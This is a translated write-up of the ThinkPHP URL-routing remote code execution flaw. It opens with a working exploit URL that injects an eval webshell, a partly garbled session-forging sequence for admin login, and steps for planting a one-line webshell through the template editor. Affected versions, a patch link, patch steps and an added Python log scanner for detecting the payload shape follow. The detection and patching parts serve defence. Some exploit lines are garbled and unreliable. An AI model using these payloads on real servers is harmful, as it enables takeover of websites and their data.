Method 1: executed directly.
http://www.2cto.com/index. php? S = vod-search-area-$ {@ print (eval ($ _ POST [c])}. html
Then connect to it directly with a webshell client (Chopper).
Method 2 (more troublesome): construct a SESSION so that you can log in to the back end directly. Execute the following three steps in sequence.
Enter in the address bar:
index.php?s=vod-search-area-00000000@$_session?adminlogin=00001).html
index.php?s=vod-search-area-00000000@$_session0000c(user_auth_key000000000000000010000.html
index.php? Bytes
After the execution is completed, log in to the back end.
Enter in the address bar:
index.php?s=Admin-Index
index.php?s=Admin-Index-Top
index.php?s=Admin-Tpl-Show
/index.php?s=Admin-Cache-Show
/index.php?s=Admin-Tpl-Show-id-. | Tpl | default
To get a shell, go to template management, pick any template, click Edit, enter the path, rename the file to xx.php and write a one-line webshell into it.
Solution: this URL-handling vulnerability lets a client forge URLs that make the server execute arbitrary code.
Affected versions: 2.1, 2.2 and 3.0. Update the core program promptly.
Patch download: http://thinkphp.cn/download-116.html
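As an added example (not part of this write-up and not ThinkPHP's own code), the following Python scanner flags access-log requests whose routed segment carries the `${func(...)}` shape described above, decoding both the PATH_INFO and every `s=` value so that percent- or double-encoding does not hide it. The log lines are constructed; the regexes and thresholds are this example's own assumptions, and the scanner is a detection aid, not a substitute for the patched Dispatcher.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample lines in combined log format (not from the page).
# Line 2 carries the ${@...} route shape, percent-encoded; line 3 is the
# same marker double-encoded and delivered through PATH_INFO instead of s=.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2012:10:00:00 +0800] "GET /index.php?s=vod-search-area-shanghai.html HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2012:10:00:03 +0800] "GET /index.php?s=vod-search-area-%24%7B%40print%281%29%7D.html HTTP/1.1" 200 64
10.0.0.9 - - [01/Jan/2012:10:00:09 +0800] "GET /index.php/vod/search/area/%2524%257B%2540print%25281%2529%257D HTTP/1.1" 200 64
10.0.0.7 - - [01/Jan/2012:10:00:12 +0800] "GET /index.php?s=Admin-Index HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# ${ optionally followed by @ (error suppression) and a function call is the
# marker for the route-evaluation flaw; legitimate route values never contain it.
PAYLOAD_RE = re.compile(r'\$\{\s*@?\s*[A-Za-z_]\w*\s*\(')

def fully_decode(s, rounds=3):
    """Percent-decode until stable (bounded) so double-encoding cannot hide the marker."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s

def route_segments(target):
    """Return the strings the framework routes on: the path and every s= value."""
    parts = urlsplit(target)
    segs = [fully_decode(parts.path)]
    for v in parse_qs(parts.query, keep_blank_values=True).get("s", []):
        segs.append(fully_decode(v))
    return segs

def scan_log(text):
    """Return (ip, target) for each request whose route carries a ${func(...)} payload."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        if any(PAYLOAD_RE.search(seg) for seg in route_segments(m["target"])):
            hits.append((m["ip"], m["target"]))
    return hits

if __name__ == "__main__":
    for ip, target in scan_log(SAMPLE_LOG):
        print(f"suspicious route from {ip}: {target}")
```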
Fix procedure:
First, extract the security patch archive.
Versions 2.1 and 2.2:
Overwrite Dispatcher.class.php in the ThinkPHP/Lib/Think/Util/ directory with the file of the same name from the patch package.
Version 3.0:
Overwrite Dispatcher.class.php in the ThinkPHP/Lib/Core/ directory with the file of the same name from the patch package.
Overwrite CheckRouteBehavior.class.php in the ThinkPHP/Lib/Behavior/ directory with the file of the same name from the patch package.